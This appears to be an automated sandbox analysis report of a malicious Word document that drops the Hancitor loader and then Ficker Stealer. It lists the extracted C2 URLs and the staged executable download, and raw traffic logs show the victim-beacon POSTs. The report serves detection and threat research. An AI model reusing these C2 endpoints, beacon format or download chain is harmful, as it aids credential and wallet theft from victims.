Loading ...

Play interactive tourEdit tour

Windows Analysis Report 0708_3355614568218.doc

Overview

General Information

Sample Name:0708_3355614568218.doc
Analysis ID:446230
MD5:992338b40b38f1f55bd4a9599f70771c
SHA1:866086438592043aebb88f3da34ad437681a5cb0
SHA256:b4d402b4ab3b5a5568f35562955d5d05357a589ccda55fde5a2c166ef5f15699
Tags:docHancitormacrosMAN1MoskalvzapoeTA511
Infos:

Most interesting Screenshot:

Detection

Ficker Stealer Hancitor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ficker Stealer
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document contains OLE streams with PE executables
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2672 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • rundll32.exe (PID: 2776 cmdline: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2668 cmdline: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • svchost.exe (PID: 2716 cmdline: C:\Windows\System32\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
    00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
      Process Memory Space: svchost.exe PID: 2716JoeSecurity_Ficker_Stealer_1Yara detected Ficker StealerJoe Security
        Process Memory Space: rundll32.exe PID: 2668JoeSecurity_HancitorYara detected HancitorJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.3.rundll32.exe.3a4392.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
            3.3.rundll32.exe.3a4392.0.unpackHancitorHancitor Payloadkevoreilly
            • 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
            3.3.rundll32.exe.3a4392.0.raw.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
              3.3.rundll32.exe.3a4392.0.raw.unpackHancitorHancitor Payloadkevoreilly
              • 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
              3.2.rundll32.exe.2110000.6.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
                Click to see the 1 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspect Svchost ActivityShow sources
                Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2668, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2716
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR, CommandLine: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2672, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR, ProcessId: 2776
                Sigma detected: Suspicious Svchost ProcessShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2668, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2716

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmpMalware Configuration Extractor: Hancitor {"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
                Multi AV Scanner detection for domain / URLShow sources
                Source: srand04rf.ruVirustotal: Detection: 13%Perma Link
                Source: pospvisis.comVirustotal: Detection: 12%Perma Link
                Multi AV Scanner detection for submitted fileShow sources
                Source: 0708_3355614568218.docVirustotal: Detection: 37%Perma Link
                Source: 3.2.rundll32.exe.2110000.6.unpackAvira: Label: TR/Hijacker.Gen

                Location Tracking:

                barindex
                Yara detected HancitorShow sources
                Source: Yara matchFile source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2668, type: MEMORY
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02112CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02112D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02112D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02112D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02112D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BAB5 CryptUnprotectData,
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.2346397243.000000000213D000.00000002.00020000.sdmp, 0708_3355614568218.doc

                Software Vulnerabilities:

                barindex
                Document exploit detected (creates forbidden files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\nimb.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\nimb.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\nimb.dllJump to behavior
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: nimb.dll.0.drJump to dropped file
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: global trafficDNS query: name: api.ipify.org
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 50.19.92.227:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 50.19.92.227:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49172
                Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49172 -> 95.213.179.67:80
                Source: TrafficSnort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49178
                Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49178 -> 95.213.179.67:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://sudepallon.com/8/forum.php
                Source: Malware configuration extractorURLs: http://anspossthrly.ru/8/forum.php
                Source: Malware configuration extractorURLs: http://thentabecon.ru/8/forum.php
                May check the online IP address of the machineShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 09 Jul 2021 01:07:42 GMTContent-Type: application/octet-streamContent-Length: 272910Connection: keep-aliveLast-Modified: Wed, 09 Jun 2021 16:00:40 GMTETag: "60c0e5a8-42a0e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: Joe Sandbox ViewIP Address: 50.19.92.227 50.19.92.227
                Source: Joe Sandbox ViewIP Address: 77.222.42.67 77.222.42.67
                Source: Joe Sandbox ViewASN Name: SWEB-ASRU SWEB-ASRU
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 105Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 30 2e 30 2e 30 2e 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srand04rf.ruCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
